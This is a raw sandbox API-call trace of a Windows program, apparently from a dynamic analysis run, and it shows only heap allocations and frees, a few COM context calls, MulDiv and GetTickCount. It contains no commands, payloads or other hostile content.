	[0068.273] ??2@YAPEAX_K@Z () returned 0x5029a0
	[0068.273] malloc (_Size=0x30) returned 0x2bf000
	[0068.273] ??2@YAPEAX_K@Z () returned 0x502a80
	[0068.274] realloc (_Block=0x0, _Size=0xa0) returned 0x502b40
	[0068.274] ??2@YAPEAX_K@Z () returned 0x2bed40
	[0068.274] ??2@YAPEAX_K@Z () returned 0x502bf0
	[0068.275] realloc (_Block=0x0, _Size=0xc8) returned 0x502c20
	[0068.275] ??2@YAPEAX_K@Z () returned 0x502cf0
	[0068.275] malloc (_Size=0x1008) returned 0x4c07f0
	[0068.275] ??2@YAPEAX_K@Z () returned 0x502d30
	[0068.276] ??2@YAPEAX_K@Z () returned 0x502bf0
	[0068.276] free (_Block=0x4c07f0) 
	[0068.276] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.276] free (_Block=0x2bf040) 
	[0068.276] free (_Block=0x502d30) 
	[0068.276] free (_Block=0x4c1a10) 
	[0068.276] free (_Block=0x4c1800) 
	[0068.276] free (_Block=0x2b82d0) 
	[0068.276] ??2@YAPEAX_K@Z () returned 0x502cf0
	[0068.276] ??2@YAPEAX_K@Z () returned 0x502d50
	[0068.277] ??2@YAPEAX_K@Z () returned 0x502c20
	[0068.277] ??2@YAPEAX_K@Z () returned 0x502e30
	[0068.277] malloc (_Size=0x18) returned 0x2bf040
	[0068.277] ??2@YAPEAX_K@Z () returned 0x502f10
	[0068.277] malloc (_Size=0x80) returned 0x4c07f0
	[0068.278] malloc (_Size=0x108) returned 0x2b82d0
	[0068.278] ??2@YAPEAX_K@Z () returned 0x4c0880
	[0068.278] malloc (_Size=0x80) returned 0x4c0930
	[0068.278] malloc (_Size=0x108) returned 0x2b83e0
	[0068.278] realloc (_Block=0x0, _Size=0xc8) returned 0x4c09c0
	[0068.279] ??2@YAPEAX_K@Z () returned 0x502ca0
	[0068.279] malloc (_Size=0x1008) returned 0x4c0a90
	[0068.279] ??2@YAPEAX_K@Z () returned 0x4c1aa0
	[0068.279] ??2@YAPEAX_K@Z () returned 0x4c1df0
	[0068.279] free (_Block=0x4c0a90) 
	[0068.279] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.279] free (_Block=0x4c1c50) 
	[0068.279] free (_Block=0x4c1aa0) 
	[0068.279] free (_Block=0x4c22a0) 
	[0068.279] free (_Block=0x4c2090) 
	[0068.279] free (_Block=0x2b84f0) 
	[0068.279] ??2@YAPEAX_K@Z () returned 0x4c0a90
	[0068.279] ??2@YAPEAX_K@Z () returned 0x4c0af0
	[0068.281] ??2@YAPEAX_K@Z () returned 0x4c0bd0
	[0068.281] malloc (_Size=0x30) returned 0x502ca0
	[0068.281] ??2@YAPEAX_K@Z () returned 0x4c0cb0
	[0068.281] malloc (_Size=0x18) returned 0x4c09c0
	[0068.282] ??2@YAPEAX_K@Z () returned 0x4c09e0
	[0068.282] malloc (_Size=0x80) returned 0x4c0d90
	[0068.282] malloc (_Size=0x108) returned 0x2b84f0
	[0068.282] ??2@YAPEAX_K@Z () returned 0x4c0e20
	[0068.294] ??2@YAPEAX_K@Z () returned 0x4c0e90
	[0068.295] ??2@YAPEAX_K@Z () returned 0x4c0f10
	[0068.295] malloc (_Size=0x208) returned 0x4c0f90
	[0068.295] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0068.354] ??2@YAPEAX_K@Z () returned 0x4c17e0
	[0068.355] ??2@YAPEAX_K@Z () returned 0x4c18a0
	[0068.355] ??2@YAPEAX_K@Z () returned 0x4c19e0
	[0068.355] ??2@YAPEAX_K@Z () returned 0x4c1b20
	[0068.356] ??2@YAPEAX_K@Z () returned 0x4c1bb0
	[0068.356] ??2@YAPEAX_K@Z () returned 0x4c2090
	[0068.356] malloc (_Size=0x80) returned 0x4c2140
	[0068.356] malloc (_Size=0x108) returned 0x2b8600
	[0068.356] ??2@YAPEAX_K@Z () returned 0x4c21d0
	[0068.356] ??2@YAPEAX_K@Z () returned 0x4c2280
	[0068.356] malloc (_Size=0x80) returned 0x4c2330
	[0068.356] malloc (_Size=0x108) returned 0x2b8710
	[0068.362] realloc (_Block=0x0, _Size=0x64) returned 0x4c23c0
	[0068.362] realloc (_Block=0x0, _Size=0x2ac) returned 0x4c2430
	[0068.362] ??2@YAPEAX_K@Z () returned 0x4c2430
	[0068.363] free (_Block=0x4c23c0) 
	[0068.363] ??2@YAPEAX_K@Z () returned 0x4c26b0
	[0068.364] ??2@YAPEAX_K@Z () returned 0x4c2760
	[0068.365] ??2@YAPEAX_K@Z () returned 0x4c2a20
	[0068.365] ??2@YAPEAX_K@Z () returned 0x4c2b00
	[0068.365] malloc (_Size=0x80) returned 0x4c4ad0
	[0068.365] malloc (_Size=0x108) returned 0x2b8820
	[0068.366] ??2@YAPEAX_K@Z () returned 0x4c1c40
	[0068.367] ??2@YAPEAX_K@Z () returned 0x4c23c0
	[0068.369] ??2@YAPEAX_K@Z () returned 0x4c23f0
	[0068.370] ??2@YAPEAX_K@Z () returned 0x4c4b60
	[0068.371] ??2@YAPEAX_K@Z () returned 0x4c4b90
	[0068.372] ??2@YAPEAX_K@Z () returned 0x4c4bc0
	[0068.374] ??2@YAPEAX_K@Z () returned 0x4c5540
	[0068.375] ??2@YAPEAX_K@Z () returned 0x4c5570
	[0068.376] ??2@YAPEAX_K@Z () returned 0x4c55a0
	[0068.377] ??2@YAPEAX_K@Z () returned 0x4c55d0
	[0068.378] ??2@YAPEAX_K@Z () returned 0x4c5600
	[0068.379] ??2@YAPEAX_K@Z () returned 0x4c5630
	[0068.381] ??2@YAPEAX_K@Z () returned 0x4c5660
	[0068.382] ??2@YAPEAX_K@Z () returned 0x4c5690
	[0068.383] ??2@YAPEAX_K@Z () returned 0x4c56c0
	[0068.385] ??2@YAPEAX_K@Z () returned 0x4c56f0
	[0068.386] ??2@YAPEAX_K@Z () returned 0x4c5720
	[0068.387] ??2@YAPEAX_K@Z () returned 0x4c5780
	[0068.395] ??2@YAPEAX_K@Z () returned 0x4c57b0
	[0068.396] ??2@YAPEAX_K@Z () returned 0x4c57e0
	[0068.397] ??2@YAPEAX_K@Z () returned 0x4c5810
	[0068.398] ??2@YAPEAX_K@Z () returned 0x4c5840
	[0068.399] ??2@YAPEAX_K@Z () returned 0x4c5870
	[0068.400] ??2@YAPEAX_K@Z () returned 0x4c58a0
	[0068.402] ??2@YAPEAX_K@Z () returned 0x4c58d0
	[0068.403] ??2@YAPEAX_K@Z () returned 0x4c5900
	[0068.412] ??2@YAPEAX_K@Z () returned 0x4c5930
	[0068.414] ??2@YAPEAX_K@Z () returned 0x4c5960
	[0068.415] ??2@YAPEAX_K@Z () returned 0x4c5990
	[0068.416] ??2@YAPEAX_K@Z () returned 0x4c59c0
	[0068.417] ??2@YAPEAX_K@Z () returned 0x4c59f0
	[0068.418] ??2@YAPEAX_K@Z () returned 0x4c5a20
	[0068.420] ??2@YAPEAX_K@Z () returned 0x4c5a50
	[0068.422] ??2@YAPEAX_K@Z () returned 0x4c5a80
	[0068.423] ??2@YAPEAX_K@Z () returned 0x4c5ab0
	[0068.424] ??2@YAPEAX_K@Z () returned 0x4c5ae0
	[0068.424] ??2@YAPEAX_K@Z () returned 0x4c5f50
	[0068.426] ??2@YAPEAX_K@Z () returned 0x4c5b10
	[0068.427] ??2@YAPEAX_K@Z () returned 0x4c5b40
	[0068.428] ??2@YAPEAX_K@Z () returned 0x4c5b70
	[0068.429] ??2@YAPEAX_K@Z () returned 0x4c5ba0
	[0068.430] ??2@YAPEAX_K@Z () returned 0x4c5bd0
	[0068.431] ??2@YAPEAX_K@Z () returned 0x4c5c00
	[0068.433] ??2@YAPEAX_K@Z () returned 0x4c5c30
	[0068.434] ??2@YAPEAX_K@Z () returned 0x4c5c60
	[0068.436] ??2@YAPEAX_K@Z () returned 0x4c5c90
	[0068.437] ??2@YAPEAX_K@Z () returned 0x4c5cc0
	[0068.438] ??2@YAPEAX_K@Z () returned 0x4c5cf0
	[0068.439] ??2@YAPEAX_K@Z () returned 0x4c5d20
	[0068.441] ??2@YAPEAX_K@Z () returned 0x4c5d50
	[0068.442] ??2@YAPEAX_K@Z () returned 0x4c5d80
	[0068.443] ??2@YAPEAX_K@Z () returned 0x4c5db0
	[0068.445] ??2@YAPEAX_K@Z () returned 0x4c5de0
	[0068.446] ??2@YAPEAX_K@Z () returned 0x4c5e10
	[0068.447] ??2@YAPEAX_K@Z () returned 0x4c5e40
	[0068.448] ??2@YAPEAX_K@Z () returned 0x4c5e70
	[0068.449] ??2@YAPEAX_K@Z () returned 0x4c5ea0
	[0068.450] ??2@YAPEAX_K@Z () returned 0x4c5ed0
	[0068.495] ??2@YAPEAX_K@Z () returned 0x4c5f00
	[0068.496] ??2@YAPEAX_K@Z () returned 0x4c6900
	[0068.501] ??2@YAPEAX_K@Z () returned 0x4c6930
	[0068.502] ??2@YAPEAX_K@Z () returned 0x4c6960
	[0068.503] ??2@YAPEAX_K@Z () returned 0x4c6990
	[0068.504] ??2@YAPEAX_K@Z () returned 0x4c69c0
	[0068.506] ??2@YAPEAX_K@Z () returned 0x4c69f0
	[0068.507] ??2@YAPEAX_K@Z () returned 0x4c6a20
	[0068.508] ??2@YAPEAX_K@Z () returned 0x4c6a50
	[0068.508] ??2@YAPEAX_K@Z () returned 0x4c70d0
	[0068.510] ??2@YAPEAX_K@Z () returned 0x4c6a80
	[0068.511] ??2@YAPEAX_K@Z () returned 0x4c6ab0
	[0068.512] ??2@YAPEAX_K@Z () returned 0x4c6ae0
	[0068.512] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0068.515] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.515] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] free (_Block=0x4c1c70) 
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] free (_Block=0x2bf040) 
	[0068.516] free (_Block=0x4c0930) 
	[0068.516] free (_Block=0x2b83e0) 
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] free (_Block=0x4c1e20) 
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.516] free (_Block=0x2bffb0) 
	[0068.517] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.517] free (_Block=0x501140) 
	[0068.517] free (_Block=0x2b7d80) 
	[0068.517] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.517] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.517] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0068.517] IUnknown:Release (This=0x3cf420) returned 0x1
	[0068.517] GetTickCount () returned 0x21e58
	[0068.518] ??2@YAPEAX_K@Z () returned 0x4c6b10
	[0068.519] ??2@YAPEAX_K@Z () returned 0x4c6b40
	[0068.520] ??2@YAPEAX_K@Z () returned 0x4c6b70
	[0068.522] ??2@YAPEAX_K@Z () returned 0x4c6ba0
	[0068.523] ??2@YAPEAX_K@Z () returned 0x4c6bd0
	[0068.524] ??2@YAPEAX_K@Z () returned 0x4c6c00
	[0068.525] ??2@YAPEAX_K@Z () returned 0x4c6c30
	[0068.526] ??2@YAPEAX_K@Z () returned 0x4c6c60
	[0068.527] ??2@YAPEAX_K@Z () returned 0x4c6c90
	[0068.529] ??2@YAPEAX_K@Z () returned 0x4c6cc0
	[0068.530] ??2@YAPEAX_K@Z () returned 0x4c6cf0
	[0068.531] ??2@YAPEAX_K@Z () returned 0x4c6d20
	[0068.533] ??2@YAPEAX_K@Z () returned 0x4c6d50
	[0068.534] ??2@YAPEAX_K@Z () returned 0x4c6d80
	[0068.535] ??2@YAPEAX_K@Z () returned 0x4c6db0
	[0068.536] ??2@YAPEAX_K@Z () returned 0x4c6de0
	[0068.537] ??2@YAPEAX_K@Z () returned 0x4c6e10
	[0068.538] ??2@YAPEAX_K@Z () returned 0x4c6e40
	[0068.540] ??2@YAPEAX_K@Z () returned 0x4c6e70
	[0068.541] ??2@YAPEAX_K@Z () returned 0x4c6ea0
	[0068.542] ??2@YAPEAX_K@Z () returned 0x4c6ed0
	[0068.544] ??2@YAPEAX_K@Z () returned 0x4c6f00
	[0068.639] ??2@YAPEAX_K@Z () returned 0x4c6f30
	[0068.640] ??2@YAPEAX_K@Z () returned 0x4c6f60
	[0068.642] ??2@YAPEAX_K@Z () returned 0x4c6f90
	[0068.643] ??2@YAPEAX_K@Z () returned 0x4c6fc0
	[0068.644] ??2@YAPEAX_K@Z () returned 0x4c6ff0
	[0068.645] ??2@YAPEAX_K@Z () returned 0x4c7020
	[0068.645] ??2@YAPEAX_K@Z () returned 0x4c7050
	[0068.646] ??2@YAPEAX_K@Z () returned 0x4c7080
	[0068.647] ??2@YAPEAX_K@Z () returned 0x4c7a80
	[0068.648] ??2@YAPEAX_K@Z () returned 0x4c7ab0
	[0068.648] ??2@YAPEAX_K@Z () returned 0x4c7ae0
	[0068.649] ??2@YAPEAX_K@Z () returned 0x4c7b10
	[0068.650] ??2@YAPEAX_K@Z () returned 0x4c7b40
	[0068.651] ??2@YAPEAX_K@Z () returned 0x4c7b70
	[0068.652] ??2@YAPEAX_K@Z () returned 0x4c7ba0
	[0068.652] ??2@YAPEAX_K@Z () returned 0x4c7bd0
	[0068.653] ??2@YAPEAX_K@Z () returned 0x4c7c00
	[0068.653] ??2@YAPEAX_K@Z () returned 0x4c7c30
	[0068.653] ??2@YAPEAX_K@Z () returned 0x4c7c60
	[0068.654] ??2@YAPEAX_K@Z () returned 0x4c7c90
	[0068.654] ??2@YAPEAX_K@Z () returned 0x4c7cc0
	[0068.654] ??2@YAPEAX_K@Z () returned 0x4c7cf0
	[0068.655] ??2@YAPEAX_K@Z () returned 0x4c7d20
	[0068.655] ??2@YAPEAX_K@Z () returned 0x4c7d50
	[0068.655] ??2@YAPEAX_K@Z () returned 0x4c7d80
	[0068.656] ??2@YAPEAX_K@Z () returned 0x4c7db0
	[0068.656] ??2@YAPEAX_K@Z () returned 0x4c7de0
	[0068.656] ??2@YAPEAX_K@Z () returned 0x4c7e10
	[0068.657] ??2@YAPEAX_K@Z () returned 0x4c7e40
	[0068.657] ??2@YAPEAX_K@Z () returned 0x4c7e70
	[0068.657] ??2@YAPEAX_K@Z () returned 0x4c7ea0
	[0068.658] ??2@YAPEAX_K@Z () returned 0x4c7ed0
	[0068.658] ??2@YAPEAX_K@Z () returned 0x4c7f00
	[0068.658] ??2@YAPEAX_K@Z () returned 0x4c7f30
	[0068.659] ??2@YAPEAX_K@Z () returned 0x4c7f60
	[0068.659] ??2@YAPEAX_K@Z () returned 0x4c7f90
	[0068.660] ??2@YAPEAX_K@Z () returned 0x4c2bb0
	[0068.660] malloc (_Size=0x208) returned 0x501090
	[0068.660] ??2@YAPEAX_K@Z () returned 0x4c0e90
	[0068.661] ??2@YAPEAX_K@Z () returned 0x502bf0
	[0068.661] ??2@YAPEAX_K@Z () returned 0x4c0880
	[0068.661] ??2@YAPEAX_K@Z () returned 0x4c2c60
	[0068.661] ??2@YAPEAX_K@Z () returned 0x4c2d10
	[0068.661] malloc (_Size=0x80) returned 0x4c0910
	[0068.661] malloc (_Size=0x108) returned 0x2b7d80
	[0068.662] ??2@YAPEAX_K@Z () returned 0x4c2dc0
	[0068.662] malloc (_Size=0x80) returned 0x4c0a90
	[0068.662] malloc (_Size=0x108) returned 0x2b83e0
	[0068.662] ??2@YAPEAX_K@Z () returned 0x4c8250
	[0068.663] ??2@YAPEAX_K@Z () returned 0x4c7f90
	[0068.663] ??2@YAPEAX_K@Z () returned 0x4c2e70
	[0068.663] ??2@YAPEAX_K@Z () returned 0x4c7f90
	[0068.664] ??2@YAPEAX_K@Z () returned 0x4c7fc0
	[0068.664] ??2@YAPEAX_K@Z () returned 0x4c7fc0
	[0068.664] ??2@YAPEAX_K@Z () returned 0x4c7ff0
	[0068.665] ??2@YAPEAX_K@Z () returned 0x4c8020
	[0068.665] ??2@YAPEAX_K@Z () returned 0x4c8020
	[0068.665] ??2@YAPEAX_K@Z () returned 0x4c8050
	[0068.666] ??2@YAPEAX_K@Z () returned 0x4c8080
	[0068.666] ??2@YAPEAX_K@Z () returned 0x4c8080
	[0068.666] ??2@YAPEAX_K@Z () returned 0x4c80b0
	[0068.667] ??2@YAPEAX_K@Z () returned 0x4c80e0
	[0068.667] ??2@YAPEAX_K@Z () returned 0x4c80e0
	[0068.667] ??2@YAPEAX_K@Z () returned 0x4c8110
	[0068.668] ??2@YAPEAX_K@Z () returned 0x4c8140
	[0068.668] ??2@YAPEAX_K@Z () returned 0x4c8140
	[0068.668] ??2@YAPEAX_K@Z () returned 0x4c8170
	[0068.669] ??2@YAPEAX_K@Z () returned 0x4c81a0
	[0068.669] ??2@YAPEAX_K@Z () returned 0x4c81a0
	[0068.670] ??2@YAPEAX_K@Z () returned 0x4c81d0
	[0068.670] ??2@YAPEAX_K@Z () returned 0x4c8200
	[0068.670] ??2@YAPEAX_K@Z () returned 0x4c8200
	[0068.671] ??2@YAPEAX_K@Z () returned 0x4c8c00
	[0068.671] ??2@YAPEAX_K@Z () returned 0x4c8c30
	[0068.671] ??2@YAPEAX_K@Z () returned 0x4c8c30
	[0068.672] ??2@YAPEAX_K@Z () returned 0x4c8c60
	[0068.672] ??2@YAPEAX_K@Z () returned 0x4c8c90
	[0068.672] ??2@YAPEAX_K@Z () returned 0x4c8c90
	[0068.673] ??2@YAPEAX_K@Z () returned 0x4c8cc0
	[0068.673] ??2@YAPEAX_K@Z () returned 0x4c8cf0
	[0068.673] ??2@YAPEAX_K@Z () returned 0x4c8cf0
	[0068.674] ??2@YAPEAX_K@Z () returned 0x4c8d20
	[0068.674] ??2@YAPEAX_K@Z () returned 0x4c8d50
	[0068.674] ??2@YAPEAX_K@Z () returned 0x4c8d50
	[0068.675] ??2@YAPEAX_K@Z () returned 0x4c8d80
	[0068.675] ??2@YAPEAX_K@Z () returned 0x4c8db0
	[0068.675] ??2@YAPEAX_K@Z () returned 0x4c8db0
	[0068.676] ??2@YAPEAX_K@Z () returned 0x4c8de0
	[0068.676] ??2@YAPEAX_K@Z () returned 0x4c93d0
	[0068.676] ??2@YAPEAX_K@Z () returned 0x4c8e10
	[0068.677] ??2@YAPEAX_K@Z () returned 0x4c8e10
	[0068.677] ??2@YAPEAX_K@Z () returned 0x4c8e40
	[0068.677] ??2@YAPEAX_K@Z () returned 0x4c8e70
	[0068.678] ??2@YAPEAX_K@Z () returned 0x4c8e70
	[0068.678] ??2@YAPEAX_K@Z () returned 0x4c8ea0
	[0068.678] ??2@YAPEAX_K@Z () returned 0x4c8ed0
	[0068.679] ??2@YAPEAX_K@Z () returned 0x4c8ed0
	[0068.679] ??2@YAPEAX_K@Z () returned 0x4c8f00
	[0068.679] ??2@YAPEAX_K@Z () returned 0x4c8f30
	[0068.680] ??2@YAPEAX_K@Z () returned 0x4c8f30
	[0068.680] ??2@YAPEAX_K@Z () returned 0x4c8f60
	[0068.680] ??2@YAPEAX_K@Z () returned 0x4c8f90
	[0068.681] ??2@YAPEAX_K@Z () returned 0x4c8f90
	[0068.681] ??2@YAPEAX_K@Z () returned 0x4c8fc0
	[0068.681] ??2@YAPEAX_K@Z () returned 0x4c8ff0
	[0068.682] ??2@YAPEAX_K@Z () returned 0x4c8ff0
	[0068.682] ??2@YAPEAX_K@Z () returned 0x4c9020
	[0068.682] ??2@YAPEAX_K@Z () returned 0x4c9050
	[0068.683] ??2@YAPEAX_K@Z () returned 0x4c9050
	[0068.683] ??2@YAPEAX_K@Z () returned 0x4c9080
	[0068.683] ??2@YAPEAX_K@Z () returned 0x4c90b0
	[0068.684] ??2@YAPEAX_K@Z () returned 0x4c90b0
	[0068.684] ??2@YAPEAX_K@Z () returned 0x4c90e0
	[0068.684] ??2@YAPEAX_K@Z () returned 0x4c9110
	[0068.685] ??2@YAPEAX_K@Z () returned 0x4c9110
	[0068.777] ??2@YAPEAX_K@Z () returned 0x4c9140
	[0068.778] ??2@YAPEAX_K@Z () returned 0x4c9170
	[0068.778] ??2@YAPEAX_K@Z () returned 0x4c9170
	[0068.784] ??2@YAPEAX_K@Z () returned 0x4c91a0
	[0068.784] ??2@YAPEAX_K@Z () returned 0x4c91d0
	[0068.784] ??2@YAPEAX_K@Z () returned 0x4c91d0
	[0068.785] ??2@YAPEAX_K@Z () returned 0x4c9200
	[0068.785] ??2@YAPEAX_K@Z () returned 0x4c9230
	[0068.785] ??2@YAPEAX_K@Z () returned 0x4c9230
	[0068.786] ??2@YAPEAX_K@Z () returned 0x4c9260
	[0068.786] ??2@YAPEAX_K@Z () returned 0x4c9d50
	[0068.787] ??2@YAPEAX_K@Z () returned 0x4c9290
	[0068.787] ??2@YAPEAX_K@Z () returned 0x4c9290
	[0068.787] ??2@YAPEAX_K@Z () returned 0x4c92c0
	[0068.788] ??2@YAPEAX_K@Z () returned 0x4c92f0
	[0068.788] ??2@YAPEAX_K@Z () returned 0x4c92f0
	[0068.788] ??2@YAPEAX_K@Z () returned 0x4c9320
	[0068.789] ??2@YAPEAX_K@Z () returned 0x4c9350
	[0068.789] ??2@YAPEAX_K@Z () returned 0x4c9350
	[0068.789] ??2@YAPEAX_K@Z () returned 0x4c9380
	[0068.789] ??2@YAPEAX_K@Z () returned 0x4ca700
	[0068.790] ??2@YAPEAX_K@Z () returned 0x4ca700
	[0068.790] ??2@YAPEAX_K@Z () returned 0x4ca730
	[0068.790] ??2@YAPEAX_K@Z () returned 0x4ca760
	[0068.791] ??2@YAPEAX_K@Z () returned 0x4ca760
	[0068.791] ??2@YAPEAX_K@Z () returned 0x4ca790
	[0068.791] ??2@YAPEAX_K@Z () returned 0x4ca7c0
	[0068.792] ??2@YAPEAX_K@Z () returned 0x4ca7c0
	[0068.792] ??2@YAPEAX_K@Z () returned 0x4ca7f0
	[0068.792] ??2@YAPEAX_K@Z () returned 0x4ca820
	[0068.793] ??2@YAPEAX_K@Z () returned 0x4ca820
	[0068.793] ??2@YAPEAX_K@Z () returned 0x4ca850
	[0068.793] ??2@YAPEAX_K@Z () returned 0x4ca880
	[0068.794] ??2@YAPEAX_K@Z () returned 0x4ca880
	[0068.794] ??2@YAPEAX_K@Z () returned 0x4ca8b0
	[0068.795] ??2@YAPEAX_K@Z () returned 0x4ca8e0
	[0068.795] ??2@YAPEAX_K@Z () returned 0x4ca8e0
	[0068.795] ??2@YAPEAX_K@Z () returned 0x4ca910
	[0068.796] ??2@YAPEAX_K@Z () returned 0x4ca940
	[0068.796] ??2@YAPEAX_K@Z () returned 0x4ca940
	[0068.796] ??2@YAPEAX_K@Z () returned 0x4ca970
	[0068.797] ??2@YAPEAX_K@Z () returned 0x4ca9a0
	[0068.797] ??2@YAPEAX_K@Z () returned 0x4ca9a0
	[0068.797] ??2@YAPEAX_K@Z () returned 0x4ca9d0
	[0068.797] ??2@YAPEAX_K@Z () returned 0x4caa00
	[0068.798] ??2@YAPEAX_K@Z () returned 0x4caa00
	[0068.798] ??2@YAPEAX_K@Z () returned 0x4caa30
	[0068.798] ??2@YAPEAX_K@Z () returned 0x4caa60
	[0068.799] ??2@YAPEAX_K@Z () returned 0x4caa60
	[0068.799] ??2@YAPEAX_K@Z () returned 0x4caa90
	[0068.800] ??2@YAPEAX_K@Z () returned 0x4caed0
	[0068.800] ??2@YAPEAX_K@Z () returned 0x4caac0
	[0068.800] ??2@YAPEAX_K@Z () returned 0x4caac0
	[0068.801] ??2@YAPEAX_K@Z () returned 0x4caaf0
	[0068.801] ??2@YAPEAX_K@Z () returned 0x4cab20
	[0068.801] ??2@YAPEAX_K@Z () returned 0x4cab20
	[0068.802] ??2@YAPEAX_K@Z () returned 0x4cab50
	[0068.802] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0068.804] ??3@YAXPEAX@Z () returned 0x1
	[0068.804] ??3@YAXPEAX@Z () returned 0xb00500001
	[0068.804] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0068.804] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0068.804] ??3@YAXPEAX@Z () returned 0xe00470001
	[0068.804] ??3@YAXPEAX@Z () returned 0xf00440001
	[0068.804] ??3@YAXPEAX@Z () returned 0x1000410001
	[0068.804] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0068.804] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0068.804] ??3@YAXPEAX@Z () returned 0x1300380001
	[0068.804] ??3@YAXPEAX@Z () returned 0x1400350001
	[0068.804] ??3@YAXPEAX@Z () returned 0x1500320001
	[0068.804] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0068.804] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0068.804] ??3@YAXPEAX@Z () returned 0x1800290001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1900260001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0068.805] ??3@YAXPEAX@Z () returned 0x2000110001
	[0068.805] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x1
	[0068.805] ??3@YAXPEAX@Z () returned 0x200200001
	[0068.805] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0068.805] ??3@YAXPEAX@Z () returned 0x500170001
	[0068.805] ??3@YAXPEAX@Z () returned 0x2300080001
	[0068.805] ??3@YAXPEAX@Z () returned 0x600140001
	[0068.806] ??3@YAXPEAX@Z () returned 0x700110001
	[0068.806] ??3@YAXPEAX@Z () returned 0x2400050001
	[0068.806] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0068.806] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0068.806] ??3@YAXPEAX@Z () returned 0xa00080001
	[0068.806] ??3@YAXPEAX@Z () returned 0xb00050001
	[0068.806] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0068.808] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0068.808] IUnknown:Release (This=0x3cf420) returned 0x1
	[0068.808] GetTickCount () returned 0x21f71
	[0068.808] ??2@YAPEAX_K@Z () returned 0x4c7a80
	[0068.808] ??2@YAPEAX_K@Z () returned 0x4c7a80
	[0068.809] ??2@YAPEAX_K@Z () returned 0x4c7ab0
	[0068.809] ??2@YAPEAX_K@Z () returned 0x4c7ae0
	[0068.810] ??2@YAPEAX_K@Z () returned 0x4c7ae0
	[0068.810] ??2@YAPEAX_K@Z () returned 0x4c7b10
	[0068.811] ??2@YAPEAX_K@Z () returned 0x4c7b40
	[0068.811] ??2@YAPEAX_K@Z () returned 0x4c7b40
	[0068.811] ??2@YAPEAX_K@Z () returned 0x4c7b70
	[0068.812] ??2@YAPEAX_K@Z () returned 0x4c7ba0
	[0068.812] ??2@YAPEAX_K@Z () returned 0x4c7ba0
	[0068.812] ??2@YAPEAX_K@Z () returned 0x4c7bd0
	[0068.813] ??2@YAPEAX_K@Z () returned 0x4c7c00
	[0068.813] ??2@YAPEAX_K@Z () returned 0x4c7c00
	[0068.813] ??2@YAPEAX_K@Z () returned 0x4c7c30
	[0068.814] ??2@YAPEAX_K@Z () returned 0x4c7c60
	[0068.814] ??2@YAPEAX_K@Z () returned 0x4c7c60
	[0068.814] ??2@YAPEAX_K@Z () returned 0x4c7c90
	[0068.815] ??2@YAPEAX_K@Z () returned 0x4c7cc0
	[0068.815] ??2@YAPEAX_K@Z () returned 0x4c7cc0
	[0068.815] ??2@YAPEAX_K@Z () returned 0x4c7cf0
	[0068.815] ??2@YAPEAX_K@Z () returned 0x4c7d20
	[0068.816] ??2@YAPEAX_K@Z () returned 0x4c7d20
	[0068.816] ??2@YAPEAX_K@Z () returned 0x4c7d50
	[0068.816] ??2@YAPEAX_K@Z () returned 0x4c7d80
	[0068.817] ??2@YAPEAX_K@Z () returned 0x4c7d80
	[0068.817] ??2@YAPEAX_K@Z () returned 0x4c7db0
	[0068.817] ??2@YAPEAX_K@Z () returned 0x4c7de0
	[0068.818] ??2@YAPEAX_K@Z () returned 0x4c7de0
	[0068.818] ??2@YAPEAX_K@Z () returned 0x4c7e10
	[0068.818] ??2@YAPEAX_K@Z () returned 0x4c7e40
	[0068.819] ??2@YAPEAX_K@Z () returned 0x4c7e40
	[0068.819] ??2@YAPEAX_K@Z () returned 0x4c7e70
	[0068.819] ??2@YAPEAX_K@Z () returned 0x4c7ea0
